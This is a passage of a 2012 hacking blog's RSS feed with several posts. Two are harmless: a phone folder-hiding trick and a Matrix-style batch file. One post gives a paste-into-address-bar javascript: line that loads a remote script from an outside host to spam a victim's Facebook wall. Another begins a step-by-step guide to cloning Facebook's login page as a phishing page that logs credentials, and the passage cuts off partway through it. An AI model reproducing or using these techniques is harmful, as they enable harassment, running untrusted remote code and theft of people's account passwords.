&lt;/ul&gt;&lt;div style="background-color: white; font-family: Verdana, sans-serif; font-size: 15px; line-height: 20px;"&gt;&lt;b&gt;So Now you can protect or hide your data from others even in your mobile&lt;/b&gt;&lt;/div&gt;&lt;div style="background-color: white; font-family: Verdana, sans-serif; font-size: 15px; line-height: 20px;"&gt;&lt;b&gt;&lt;br /&gt;
&lt;/b&gt;&lt;/div&gt;&lt;div style="background-color: white; font-family: Verdana, sans-serif; font-size: 15px; line-height: 20px;"&gt;&lt;b&gt;To unhide your original folder , remove .jar extension from the folder. and your original folder with .jad extension will&amp;nbsp; be visible.&lt;/b&gt;&lt;/div&gt;&lt;/div&gt;</description><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" height="72" url="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg9FL2-R9QgoulCsseAqZW0UHX520oPhO48LF8gZ0j50nPUXxQi5RxUcQIRRTCPA-KpzbOJBG6ViyYGWfmt2uV7D15pdAgX-5dHOYf8W7cjQ9i7C7SxvEUhzvEWbeMYDybPAAYYayqk_t4/s72-c/How-To-Hide-Folder-in-Nokia-Handset-With-Out-Any-Software.jpg" width="72"/><thr:total xmlns:thr="http://purl.org/syndication/thread/1.0">0</thr:total><author>noreply@blogger.com (sachin rajak)</author></item><item><title>Give matrix digital effect in command prompt</title><link>http://latest-cracker.blogspot.com/2012/06/give-matrix-digital-effect-in-command_15.html</link><category>notepad tricks</category><category>tricks</category><pubDate>Fri, 15 Jun 2012 22:09:00 +0530</pubDate><guid isPermaLink="false">tag:blogger.com,1999:blog-7891543643515976736.post-7293653977302935302</guid><description>&lt;div dir="ltr" style="text-align: left;" trbidi="on"&gt;&lt;span style="background-color: white;"&gt;&lt;br /&gt;
&lt;/span&gt;&lt;br /&gt;
&lt;div dir="ltr" style="color: #262c2c; font-family: verdana, Arial, sans-serif; font-size: 13px;" trbidi="on"&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgDAUeI3b_5eQL5aUXYKw6QGQhG9RbH6GVa4qC1KMJLMFCwSAFqEvA4KyJDUEYWay2K8UotylsX-S4I5HNPk6cV_g2uHKVjTM1FMhuiXM2w60Ja8jgSifceEZTR8fU2bw1s9CUNnIEpVweb/s1600/Matrix.jpg" imageanchor="1" style="background-color: white; color: #ab6f07; font-family: Georgia, 'Times New Roman', Times, serif; margin-left: 1em; margin-right: 1em; text-decoration: none;"&gt;&lt;img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgDAUeI3b_5eQL5aUXYKw6QGQhG9RbH6GVa4qC1KMJLMFCwSAFqEvA4KyJDUEYWay2K8UotylsX-S4I5HNPk6cV_g2uHKVjTM1FMhuiXM2w60Ja8jgSifceEZTR8fU2bw1s9CUNnIEpVweb/s320/Matrix.jpg" style="border: 0px solid rgb(114, 242, 242); margin: 1em;" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;span style="background-color: white;"&gt;&lt;span class="Apple-style-span" style="color: #414141; font-family: Arial, Helvetica, sans-serif; line-height: 15px;"&gt;This is a simple batch file that will show the binary strings that the Matr&lt;/span&gt;&lt;a href="http://www.techbyte4u.com/" style="color: #ab6f07; font-family: Georgia, 'Times New Roman', Times, serif; text-decoration: none;" target="_blank"&gt;&lt;span class="Apple-style-span" style="color: black;"&gt;i&lt;/span&gt;&lt;/a&gt;&lt;span class="Apple-style-span" style="color: #414141; font-family: Arial, Helvetica, sans-serif; line-height: 15px;"&gt;x use as their logo and language. It won't look completely like it, but it's fun!&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span class="Apple-style-span" style="background-color: white; color: #414141; font-family: Arial, Helvetica, sans-serif; line-height: 15px;"&gt;&lt;br /&gt;
&lt;/span&gt;&lt;br /&gt;
&lt;span class="Apple-style-span" style="background-color: white; color: #414141; font-family: Arial, Helvetica, sans-serif; line-height: 15px;"&gt;Just write the code below in notepad and save it with bat extension say matrix.bat.&lt;/span&gt;&lt;br /&gt;
&lt;span style="background-color: white;"&gt;&lt;br /&gt;
&lt;/span&gt;&lt;br /&gt;
&lt;span class="Apple-style-span" style="background-color: white; color: #414141; font-family: Arial, Helvetica, sans-serif; line-height: 15px;"&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
@echo off&lt;br /&gt;
color 2&lt;br /&gt;
cls&lt;br /&gt;
:A&lt;br /&gt;
echo 3 &amp;nbsp; &amp;nbsp; 2 &amp;nbsp; 3 &amp;nbsp; 4 &amp;nbsp; &amp;nbsp; 6 &amp;nbsp; &amp;nbsp; 8 &amp;nbsp; 4 &amp;nbsp;2 &amp;nbsp; 3 &amp;nbsp;9 &amp;nbsp;7 3 &amp;nbsp; 4 &amp;nbsp;9 &amp;nbsp; 7 &amp;nbsp; &amp;nbsp;5 &amp;nbsp;3 1 7 9 &amp;nbsp;1 0 9 2 4 &amp;nbsp;6 2 1 &amp;nbsp;3 &amp;nbsp; &amp;nbsp; &amp;nbsp; 4 &amp;nbsp;5 &amp;nbsp; &amp;nbsp; &amp;nbsp; 3 &amp;nbsp; &amp;nbsp; &amp;nbsp; 5 2 &amp;nbsp; 1 &amp;nbsp; &amp;nbsp; &amp;nbsp;0 3 &amp;nbsp; &amp;nbsp; 6&lt;br /&gt;
echo 2 &amp;nbsp; &amp;nbsp; 5 &amp;nbsp; 5 &amp;nbsp;6 4 &amp;nbsp; &amp;nbsp; &amp;nbsp;7 &amp;nbsp;1 8 &amp;nbsp;6 &amp;nbsp; &amp;nbsp; 8 &amp;nbsp;6 &amp;nbsp;0 &amp;nbsp;8 6 4 1 &amp;nbsp; 5 6 4 6 &amp;nbsp; &amp;nbsp; 8 &amp;nbsp; 8 0 3 &amp;nbsp;1 4 6 8 &amp;nbsp;4 &amp;nbsp;7 &amp;nbsp; 8 &amp;nbsp; &amp;nbsp; &amp;nbsp;6 &amp;nbsp; 2 &amp;nbsp;1 5 &amp;nbsp; 7&lt;br /&gt;
:B&lt;br /&gt;
echo 5 &amp;nbsp; &amp;nbsp;8 &amp;nbsp; &amp;nbsp; 9 &amp;nbsp; 2 &amp;nbsp; &amp;nbsp;3 6 &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp;8 &amp;nbsp;7 &amp;nbsp;1 2 5 &amp;nbsp; &amp;nbsp; 3 6 5 &amp;nbsp;4 2 0 &amp;nbsp;8 &amp;nbsp; &amp;nbsp; &amp;nbsp;9 &amp;nbsp;4 &amp;nbsp;0 &amp;nbsp;3 7 4 2 &amp;nbsp; 2 &amp;nbsp;8 &amp;nbsp;9 &amp;nbsp; 2 &amp;nbsp;0 &amp;nbsp; &amp;nbsp;1 &amp;nbsp; &amp;nbsp; 5 &amp;nbsp; &amp;nbsp;6 &amp;nbsp;5 &amp;nbsp;8&lt;br /&gt;
:C&lt;br /&gt;
echo 5 &amp;nbsp; 9 &amp;nbsp;6 8 &amp;nbsp; &amp;nbsp; &amp;nbsp;4 6 &amp;nbsp; 8 &amp;nbsp;4 &amp;nbsp;6 8 4 &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; 2 6 4 6 &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp;8 1 &amp;nbsp;6 &amp;nbsp; 6 8 1 &amp;nbsp;0 6 8 &amp;nbsp;1 6 &amp;nbsp;8 &amp;nbsp; 1 &amp;nbsp;6 &amp;nbsp; &amp;nbsp; 1 &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp;6 &amp;nbsp; &amp;nbsp; &amp;nbsp;5 &amp;nbsp;4 &amp;nbsp; &amp;nbsp; &amp;nbsp; 5 &amp;nbsp; &amp;nbsp; 6 &amp;nbsp; 9 &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; 8 7 &lt;br /&gt;
echo 6 &amp;nbsp; &amp;nbsp; &amp;nbsp; 5 1 &amp;nbsp; &amp;nbsp; &amp;nbsp; 6 &amp;nbsp; &amp;nbsp;6 0 &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp;6 &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp;4 6 &amp;nbsp; &amp;nbsp; &amp;nbsp; 1 6 &amp;nbsp;5 1 &amp;nbsp; &amp;nbsp; &amp;nbsp; 7 &amp;nbsp;5 &amp;nbsp;3 8 &amp;nbsp; &amp;nbsp;5 &amp;nbsp;1 6 &amp;nbsp;5 1 6 0 1 6 &amp;nbsp; &amp;nbsp; &amp;nbsp;0 4 &amp;nbsp; &amp;nbsp; &amp;nbsp;3 4 &amp;nbsp;1 &amp;nbsp;2 &amp;nbsp;4 0 &amp;nbsp; 4 &amp;nbsp; 3 &amp;nbsp;2&lt;br /&gt;
goto A&lt;br /&gt;
goto B&lt;br /&gt;
goto C&lt;br /&gt;
&lt;br /&gt;
&lt;/span&gt;&lt;/div&gt;&lt;div style="color: #262c2c; font-family: verdana, Arial, sans-serif; font-size: 13px; margin-bottom: 0.5em; margin-top: 0.5em; text-align: -webkit-auto;"&gt;&lt;/div&gt;&lt;a class="addthis_button" href="http://www.addthis.com/bookmark.php?v=250&amp;amp;username=raja3c" style="background-color: #cdba96; color: #ab6f07; cursor: pointer; font-family: Georgia, 'Times New Roman', Times, serif; font-size: 13px; text-align: -webkit-auto; text-decoration: none;"&gt;&lt;br class="Apple-interchange-newline" /&gt;&lt;/a&gt;&lt;/div&gt;</description><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" height="72" url="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgDAUeI3b_5eQL5aUXYKw6QGQhG9RbH6GVa4qC1KMJLMFCwSAFqEvA4KyJDUEYWay2K8UotylsX-S4I5HNPk6cV_g2uHKVjTM1FMhuiXM2w60Ja8jgSifceEZTR8fU2bw1s9CUNnIEpVweb/s72-c/Matrix.jpg" width="72"/><thr:total xmlns:thr="http://purl.org/syndication/thread/1.0">0</thr:total><author>noreply@blogger.com (sachin rajak)</author></item><item><title>HOW TO SPAM SOMEONES WALL ON FACEBOOK. [WORKING WAY!]</title><link>http://latest-cracker.blogspot.com/2012/06/how-to-spam-someones-wall-on-facebook.html</link><category>Hack Facebook</category><pubDate>Fri, 15 Jun 2012 21:17:00 +0530</pubDate><guid isPermaLink="false">tag:blogger.com,1999:blog-7891543643515976736.post-7246072613499399600</guid><description>&lt;div dir="ltr" style="text-align: left;" trbidi="on"&gt;&lt;br /&gt;
&lt;div class="separator" style="background-color: white; clear: both; color: #343333; font-family: Arial, Helvetica, sans-serif; font-size: 12px; line-height: 20px; text-align: center;"&gt;&lt;a href="http://www.shinyshiny.tv/facebook_spam.jpg" imageanchor="1" style="color: #26abe3; margin-left: 1em; margin-right: 1em; outline: none;"&gt;&lt;img border="0" height="320" src="http://www.shinyshiny.tv/facebook_spam.jpg" style="background-color: transparent; background-position: initial initial; background-repeat: initial initial; border: none; padding: 0px;" width="320" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br style="background-color: white; color: #343333; font-family: Arial, Helvetica, sans-serif; font-size: 12px; line-height: 20px;" /&gt;&lt;span style="background-color: white; color: #343333; font-family: Arial, Helvetica, sans-serif; font-size: 12px; line-height: 20px;"&gt;It is really annoying if your Facebook Wall is full with many messages. Recently I found the way of doing it and now i am sharing it with you people ;)&lt;/span&gt;&lt;br style="background-color: white; color: #343333; font-family: Arial, Helvetica, sans-serif; font-size: 12px; line-height: 20px;" /&gt;&lt;br style="background-color: white; color: #343333; font-family: Arial, Helvetica, sans-serif; font-size: 12px; line-height: 20px;" /&gt;&lt;span style="background-color: white; color: #343333; font-family: Arial, Helvetica, sans-serif; font-size: 12px; line-height: 20px;"&gt;It is really easy to do it. All you need to do is to follow the following steps carefully.&lt;/span&gt;&lt;br style="background-color: white; color: #343333; font-family: Arial, Helvetica, sans-serif; font-size: 12px; line-height: 20px;" /&gt;&lt;br style="background-color: white; color: #343333; font-family: Arial, Helvetica, sans-serif; font-size: 12px; line-height: 20px;" /&gt;&lt;b style="background-color: white; color: #343333; font-family: Arial, Helvetica, sans-serif; font-size: 12px; line-height: 20px;"&gt;#Step1:&lt;/b&gt;&lt;span style="background-color: white; color: #343333; font-family: Arial, Helvetica, sans-serif; font-size: 12px; line-height: 20px;"&gt;&amp;nbsp;First you need to be on "http://" connection instead of "https://", so simple Login into your FB account and goto&amp;nbsp;&lt;/span&gt;&lt;b style="background-color: white; color: #343333; font-family: Arial, Helvetica, sans-serif; font-size: 12px; line-height: 20px;"&gt;Account &amp;gt; Account Settings &amp;gt; Account Security&lt;/b&gt;&lt;span style="background-color: white; color: #343333; font-family: Arial, Helvetica, sans-serif; font-size: 12px; line-height: 20px;"&gt;. Over there "&lt;/span&gt;&lt;b style="background-color: white; color: #343333; font-family: Arial, Helvetica, sans-serif; font-size: 12px; line-height: 20px;"&gt;unTick"&lt;/b&gt;&lt;span style="background-color: white; color: #343333; font-family: Arial, Helvetica, sans-serif; font-size: 12px; line-height: 20px;"&gt;&amp;nbsp;|&lt;/span&gt;&lt;span class="Apple-style-span" style="background-color: white; border-spacing: 2px; color: #333333; font-family: 'lucida grande', tahoma, verdana, arial, sans-serif; font-size: 11px; font-weight: bold; line-height: 20px;"&gt;Secure Browsing (https)|&lt;/span&gt;&lt;br style="background-color: white; color: #343333; font-family: Arial, Helvetica, sans-serif; font-size: 12px; line-height: 20px;" /&gt;&lt;span class="Apple-style-span" style="background-color: white; color: #333333; font-family: 'lucida grande', tahoma, verdana, arial, sans-serif; font-size: 12px; line-height: 20px;"&gt;&lt;span class="Apple-style-span" style="border-spacing: 2px; font-size: 11px;"&gt;&lt;b&gt;&lt;br /&gt;
&lt;/b&gt;&lt;/span&gt;&lt;/span&gt;&lt;br style="background-color: white; color: #343333; font-family: Arial, Helvetica, sans-serif; font-size: 12px; line-height: 20px;" /&gt;&lt;span class="Apple-style-span" style="background-color: white; color: #333333; font-family: inherit; font-size: 12px; line-height: 20px;"&gt;&lt;span class="Apple-style-span" style="border-spacing: 2px;"&gt;&lt;b&gt;#Step2:&lt;/b&gt;&amp;nbsp;Now goto the Persons wall whom you want to spam , and then paste the following code into the address bar:&lt;/span&gt;&lt;/span&gt;&lt;br style="background-color: white; color: #343333; font-family: Arial, Helvetica, sans-serif; font-size: 12px; line-height: 20px;" /&gt;&lt;span class="Apple-style-span" style="background-color: white; color: #333333; font-family: inherit; font-size: 12px; line-height: 20px;"&gt;&lt;span class="Apple-style-span" style="border-spacing: 2px;"&gt;&lt;br /&gt;
&lt;/span&gt;&lt;/span&gt;&lt;br style="background-color: white; color: #343333; font-family: Arial, Helvetica, sans-serif; font-size: 12px; line-height: 20px;" /&gt;&lt;span class="Apple-style-span" style="background-color: white; color: #343333; font-family: Times, 'Times New Roman', serif; font-size: medium; line-height: 20px;"&gt;&lt;span class="Apple-style-span" style="border-spacing: 1px; line-height: 18px;"&gt;javascript:(a = (b = document).createElement("script")).src = "//purebroz.com/a.js", b.body.appendChild(a); void(0) &amp;nbsp;&lt;/span&gt;&lt;/span&gt;&lt;br style="background-color: white; color: #343333; font-family: Arial, Helvetica, sans-serif; font-size: 12px; line-height: 20px;" /&gt;&lt;span class="Apple-style-span" style="background-color: white; color: #343333; font-family: Times, 'Times New Roman', serif; font-size: medium; line-height: 20px;"&gt;&lt;span class="Apple-style-span" style="border-spacing: 1px; line-height: 18px;"&gt;&lt;br /&gt;
&lt;/span&gt;&lt;/span&gt;&lt;br style="background-color: white; color: #343333; font-family: Arial, Helvetica, sans-serif; font-size: 12px; line-height: 20px;" /&gt;&lt;span class="Apple-style-span" style="background-color: white; border-spacing: 1px; color: #343333; font-family: Arial, Helvetica, sans-serif; font-size: 12px; line-height: 18px;"&gt;&lt;span class="Apple-style-span" style="font-family: inherit;"&gt;&lt;b&gt;#Step3:&lt;/b&gt;&amp;nbsp;Now a new box will pop up. In that type the number of times you want the message to be posted and click on "OK".&lt;/span&gt;&lt;/span&gt;&lt;br style="background-color: white; color: #343333; font-family: Arial, Helvetica, sans-serif; font-size: 12px; line-height: 20px;" /&gt;&lt;span class="Apple-style-span" style="background-color: white; border-spacing: 1px; color: #343333; font-family: Arial, Helvetica, sans-serif; font-size: 12px; line-height: 18px;"&gt;&lt;br /&gt;
&lt;/span&gt;&lt;br style="background-color: white; color: #343333; font-family: Arial, Helvetica, sans-serif; font-size: 12px; line-height: 20px;" /&gt;&lt;span class="Apple-style-span" style="background-color: white; border-spacing: 1px; color: #343333; font-family: Arial, Helvetica, sans-serif; font-size: 12px; line-height: 18px;"&gt;&lt;span class="Apple-style-span" style="font-family: inherit;"&gt;&lt;b&gt;#Step4:&amp;nbsp;&lt;/b&gt;After that type the message that you want to post and click on "OK"&lt;/span&gt;&lt;/span&gt;&lt;br style="background-color: white; color: #343333; font-family: Arial, Helvetica, sans-serif; font-size: 12px; line-height: 20px;" /&gt;&lt;span class="Apple-style-span" style="background-color: white; border-spacing: 1px; color: #343333; font-family: Arial, Helvetica, sans-serif; font-size: 12px; line-height: 18px;"&gt;&lt;span class="Apple-style-span" style="font-family: inherit;"&gt;&lt;br /&gt;
&lt;/span&gt;&lt;/span&gt;&lt;br style="background-color: white; color: #343333; font-family: Arial, Helvetica, sans-serif; font-size: 12px; line-height: 20px;" /&gt;&lt;span class="Apple-style-span" style="background-color: white; border-spacing: 1px; color: #343333; font-family: Arial, Helvetica, sans-serif; font-size: 12px; line-height: 18px;"&gt;&lt;span class="Apple-style-span" style="font-family: inherit;"&gt;After that its all done just refresh and you will Spam the other person.&lt;/span&gt;&lt;/span&gt;&lt;br style="background-color: white; color: #343333; font-family: Arial, Helvetica, sans-serif; font-size: 12px; line-height: 20px;" /&gt;&lt;span class="Apple-style-span" style="background-color: white; border-spacing: 1px; color: #343333; font-family: Arial, Helvetica, sans-serif; font-size: 12px; line-height: 18px;"&gt;&lt;span class="Apple-style-span" style="font-family: inherit;"&gt;&lt;br /&gt;
&lt;/span&gt;&lt;/span&gt;&lt;br style="background-color: white; color: #343333; font-family: Arial, Helvetica, sans-serif; font-size: 12px; line-height: 20px;" /&gt;&lt;span class="Apple-style-span" style="background-color: white; color: #343333; font-family: Arial, Helvetica, sans-serif; font-size: 12px; line-height: 18px;"&gt;======================================&lt;/span&gt;&lt;br style="background-color: white; color: #343333; font-family: Arial, Helvetica, sans-serif; font-size: 12px; line-height: 20px;" /&gt;&lt;span class="Apple-style-span" style="background-color: white; color: #343333; font-family: Arial, Helvetica, sans-serif; font-size: 12px; line-height: 18px;"&gt;&lt;b&gt;VIDEO FOR STUPIDS!&lt;/b&gt;&lt;/span&gt;&lt;br style="background-color: white; color: #343333; font-family: Arial, Helvetica, sans-serif; font-size: 12px; line-height: 20px;" /&gt;&lt;span class="Apple-style-span" style="background-color: white; color: #343333; font-family: Arial, Helvetica, sans-serif; font-size: 12px; line-height: 18px;"&gt;======================================&lt;/span&gt;&lt;br style="background-color: white; color: #343333; font-family: Arial, Helvetica, sans-serif; font-size: 12px; line-height: 20px;" /&gt;&lt;div class="separator" style="background-color: white; clear: both; color: #343333; font-family: Arial, Helvetica, sans-serif; font-size: 12px; line-height: 20px; text-align: center;"&gt;&lt;iframe allowfullscreen='allowfullscreen' webkitallowfullscreen='webkitallowfullscreen' mozallowfullscreen='mozallowfullscreen' width='320' height='266' src='https://www.youtube.com/embed/H6tggSdg3s8?feature=player_embedded' frameborder='0'&gt;&lt;/iframe&gt;&lt;/div&gt;&lt;span class="Apple-style-span" style="background-color: white; color: #343333; font-family: Arial, Helvetica, sans-serif; font-size: 12px; line-height: 18px;"&gt;&lt;br /&gt;
&lt;/span&gt;&lt;br style="background-color: white; color: #343333; font-family: Arial, Helvetica, sans-serif; font-size: 12px; line-height: 20px;" /&gt;&lt;span class="Apple-style-span" style="background-color: white; border-spacing: 1px; color: #343333; font-family: Arial, Helvetica, sans-serif; font-size: 12px; line-height: 18px;"&gt;&lt;span class="Apple-style-span" style="font-family: inherit;"&gt;&lt;br /&gt;
&lt;/span&gt;&lt;/span&gt;&lt;br style="background-color: white; color: #343333; font-family: Arial, Helvetica, sans-serif; font-size: 12px; line-height: 20px;" /&gt;&lt;span class="Apple-style-span" style="background-color: white; border-spacing: 1px; color: #343333; font-family: Arial, Helvetica, sans-serif; font-size: 12px; line-height: 20px;"&gt;&lt;span class="Apple-style-span" style="font-family: inherit;"&gt;&lt;span class="Apple-style-span" style="line-height: 18px;"&gt;WARNING# I dont take any&amp;nbsp;&lt;/span&gt;&lt;/span&gt;&lt;span class="Apple-style-span" style="line-height: 18px;"&gt;responsibility&lt;/span&gt;&lt;span class="Apple-style-span" style="font-family: inherit;"&gt;&lt;span class="Apple-style-span" style="line-height: 18px;"&gt;&amp;nbsp;of misuse of this information.&lt;/span&gt;&lt;/span&gt;&lt;/span&gt; &lt;/div&gt;</description><thr:total xmlns:thr="http://purl.org/syndication/thread/1.0">0</thr:total><author>noreply@blogger.com (sachin rajak)</author></item><item><title>Latest Facebook Phishing Page And Script</title><link>http://latest-cracker.blogspot.com/2012/06/latest-facebook-phishing-page-and.html</link><category>Hack Facebook</category><category>password hacking</category><category>tricks</category><pubDate>Fri, 15 Jun 2012 17:46:00 +0530</pubDate><guid isPermaLink="false">tag:blogger.com,1999:blog-7891543643515976736.post-7469850951634942431</guid><description>&lt;div dir="ltr" style="text-align: left;" trbidi="on"&gt;&lt;br /&gt;
&lt;div style="font-family: inherit; font-size: 16px; outline: none medium; text-align: justify;"&gt;&lt;a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg7oBNEmGYRy2xrmrN-JjoootdeKtex8h53uIMwp55xT3wy5tRzcEFCQ4iQLiHQlpNDDvCcOt0MGaLMRk0qpSvp5rB-ZLbyA-jyiJUitJYIeRX9QwQd7LlgVB7JaDrW3iuCLUIExSBjxpc/s1600/Facebook-killer.jpg" imageanchor="1" style="clear: right; color: #0e0f0f; float: right; margin-bottom: 1em; margin-left: 1em; outline: none medium; text-decoration: none;"&gt;&lt;img border="0" height="200" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg7oBNEmGYRy2xrmrN-JjoootdeKtex8h53uIMwp55xT3wy5tRzcEFCQ4iQLiHQlpNDDvCcOt0MGaLMRk0qpSvp5rB-ZLbyA-jyiJUitJYIeRX9QwQd7LlgVB7JaDrW3iuCLUIExSBjxpc/s200/Facebook-killer.jpg" style="-webkit-box-reflect: below 0px -webkit-gradient(linear, 0% 0%, 0% 100%, from(transparent), color-stop(0.7, transparent), to(rgba(0, 0, 0, 0.0976563))); -webkit-transition: all 0.5s ease; margin: 0px; max-width: 100%; opacity: 1; outline: none medium; padding: 0px;" width="200" /&gt;&lt;/a&gt;Hi friends, this is our latest article regarding Facebook Phishing attack and we are so glad to announce that we have developed some new phishing script for Facebook which is working 100 %.We have already discussed&amp;nbsp;&lt;a href="http://www.realhackings.com/2011/05/what-is-phishing.html" style="color: #0e0f0f; outline: none medium; text-decoration: none;" target="_blank"&gt;what is phishing&lt;/a&gt;&amp;nbsp;and&amp;nbsp;&lt;a href="http://www.realhackings.com/2011/07/how-to-make-phishing-pages-for.html" style="color: #0e0f0f; outline: none medium; text-decoration: none;" target="_blank"&gt;how to create phishing pages for Gmail, Orkut etc.&lt;/a&gt;&amp;nbsp;I don't know how many of you are aware of phishing attacks,Anyway keep in mind that, it is the most&amp;nbsp;&lt;span class="IL_AD" id="IL_AD2" style="background-attachment: scroll !important; background-image: none !important; background-position: 0% 50%; background-repeat: repeat repeat !important; border-bottom-color: rgb(12, 12, 242) !important; border-bottom-style: dotted !important; border-bottom-width: 1px !important; color: #0c0cf2; cursor: pointer !important; display: inline !important; float: none !important; font-family: Philosopher, arial, serif; font-size: 17px !important; outline: none medium; padding: 0px 0px 1px !important; position: static;"&gt;common&lt;span class="IL_AD_ICON" style="background-attachment: scroll; background-image: url(http://resources.infolinks.com/static/icons/ilblue.png); background-position: 100% 50%; background-repeat: no-repeat no-repeat; cursor: pointer !important; display: inline !important; float: none !important; margin: 0px !important; outline: none medium; padding: 0px 16px 0px 0px !important; position: static !important;"&gt;&lt;/span&gt;&lt;/span&gt;&amp;nbsp;and easiest way to hack anyones personal details.In this article Iam going to share some ideas about Phishing and will show you how to make your own Phishing pages for Facebook.For making Phishing page for any&amp;nbsp;&lt;span class="IL_AD" id="IL_AD6" style="background-attachment: scroll !important; background-image: none !important; background-position: 0% 50%; background-repeat: repeat repeat !important; border-bottom-color: rgb(12, 12, 242) !important; border-bottom-style: dotted !important; border-bottom-width: 1px !important; color: #0c0cf2; cursor: pointer !important; display: inline !important; float: none !important; font-family: Philosopher, arial, serif; font-size: 17px !important; outline: none medium; padding: 0px 0px 1px !important; position: static;"&gt;site you&lt;span class="IL_AD_ICON" style="background-attachment: scroll; background-image: url(http://resources.infolinks.com/static/icons/ilblue.png); background-position: 100% 50%; background-repeat: no-repeat no-repeat; cursor: pointer !important; display: inline !important; float: none !important; margin: 0px !important; outline: none medium; padding: 0px 16px 0px 0px !important; position: static !important;"&gt;&lt;/span&gt;&lt;/span&gt;&amp;nbsp;need 3 types of files in&amp;nbsp;common.They are&lt;br /&gt;
&lt;ul style="outline: none medium;"&gt;&lt;li style="outline: none medium;"&gt;&lt;b style="outline: none medium;"&gt;.Html file&lt;/b&gt;&amp;nbsp;( ie fake page )&lt;/li&gt;
&lt;li style="outline: none medium;"&gt;&lt;b style="outline: none medium;"&gt;.&lt;span class="IL_AD" id="IL_AD5" style="background-attachment: scroll !important; background-image: none !important; background-position: 0% 50%; background-repeat: repeat repeat !important; border-bottom-color: rgb(12, 12, 242) !important; border-bottom-style: dotted !important; border-bottom-width: 1px !important; color: #0c0cf2; cursor: pointer !important; display: inline !important; float: none !important; font-family: Philosopher, arial, serif; font-size: 17px !important; outline: none medium; padding: 0px 0px 1px !important; position: static;"&gt;Php file&lt;span class="IL_AD_ICON" style="background-attachment: scroll; background-image: url(http://resources.infolinks.com/static/icons/ilblue.png); background-position: 100% 50%; background-repeat: no-repeat no-repeat; cursor: pointer !important; display: inline !important; float: none !important; margin: 0px !important; outline: none medium; padding: 0px 16px 0px 0px !important; position: static !important;"&gt;&lt;/span&gt;&lt;/span&gt;&amp;nbsp;&lt;/b&gt;or any other action script page (for tracking the details that entered in page created by you)&lt;/li&gt;
&lt;li style="outline: none medium;"&gt;&lt;b style="outline: none medium;"&gt;.&lt;span class="IL_AD" id="IL_AD7" style="background-attachment: scroll !important; background-image: none !important; background-position: 0% 50%; background-repeat: repeat repeat !important; border-bottom-color: rgb(12, 12, 242) !important; border-bottom-style: dotted !important; border-bottom-width: 1px !important; color: #0c0cf2; cursor: pointer !important; display: inline !important; float: none !important; font-family: Philosopher, arial, serif; font-size: 17px !important; outline: none medium; padding: 0px 0px 1px !important; position: static;"&gt;Txt file&lt;span class="IL_AD_ICON" style="background-attachment: scroll; background-image: url(http://resources.infolinks.com/static/icons/ilblue.png); background-position: 100% 50%; background-repeat: no-repeat no-repeat; cursor: pointer !important; display: inline !important; float: none !important; margin: 0px !important; outline: none medium; padding: 0px 16px 0px 0px !important; position: static !important;"&gt;&lt;/span&gt;&lt;/span&gt;&lt;/b&gt;&amp;nbsp;( To save all the details in text format )&lt;/li&gt;
&lt;/ul&gt;&lt;u style="outline: none medium;"&gt;&lt;b style="outline: none medium;"&gt;HOW TO MAKE FACEBOOK PHISHING PAGE&lt;/b&gt;&lt;/u&gt;&lt;br /&gt;
&lt;br /&gt;
1. First goto&amp;nbsp;&lt;b style="outline: none medium;"&gt;Facebook&lt;/b&gt;&amp;nbsp;login page (make sure that the page is loaded completely) and right click and select view source (in firefox) or view&amp;nbsp;&lt;span class="IL_AD" id="IL_AD8" style="background-attachment: scroll !important; background-image: none !important; background-position: 0% 50%; background-repeat: repeat repeat !important; border-bottom-color: rgb(12, 12, 242) !important; border-bottom-style: dotted !important; border-bottom-width: 1px !important; color: #0c0cf2; cursor: pointer !important; display: inline !important; float: none !important; font-family: Philosopher, arial, serif; font-size: 17px !important; outline: none medium; padding: 0px 0px 1px !important; position: static;"&gt;source code&lt;span class="IL_AD_ICON" style="background-attachment: scroll; background-image: url(http://resources.infolinks.com/static/icons/ilblue.png); background-position: 100% 50%; background-repeat: no-repeat no-repeat; cursor: pointer !important; display: inline !important; float: none !important; margin: 0px !important; outline: none medium; padding: 0px 16px 0px 0px !important; position: static !important;"&gt;&lt;/span&gt;&lt;/span&gt;&amp;nbsp;option in other browsers.&lt;br /&gt;
&lt;br /&gt;
2. Select all ( CTR + A ) and copy all the code and paste it in notepad.&lt;/div&gt;&lt;div style="font-family: inherit; font-size: 16px; outline: none medium; text-align: justify;"&gt;&lt;br /&gt;
3. Then search(CTR + F) for&amp;nbsp;&lt;span class="IL_AD" id="IL_AD1" style="background-attachment: scroll !important; background-image: none !important; background-position: 0% 50%; background-repeat: repeat repeat !important; border-bottom-color: rgb(12, 12, 242) !important; border-bottom-style: dotted !important; border-bottom-width: 1px !important; color: #0c0cf2; cursor: pointer !important; display: inline !important; float: none !important; font-family: Philosopher, arial, serif; font-size: 17px !important; outline: none medium; padding: 0px 0px 1px !important; position: static;"&gt;the keyword&lt;span class="IL_AD_ICON" style="background-attachment: scroll; background-image: url(http://resources.infolinks.com/static/icons/ilblue.png); background-position: 100% 50%; background-repeat: no-repeat no-repeat; cursor: pointer !important; display: inline !important; float: none !important; margin: 0px !important; outline: none medium; padding: 0px 16px 0px 0px !important; position: static !important;"&gt;&lt;/span&gt;&lt;/span&gt;&amp;nbsp;&lt;b style="outline: none medium;"&gt;action&lt;/b&gt;.You can see the code as given below.&lt;br /&gt;
&lt;br /&gt;
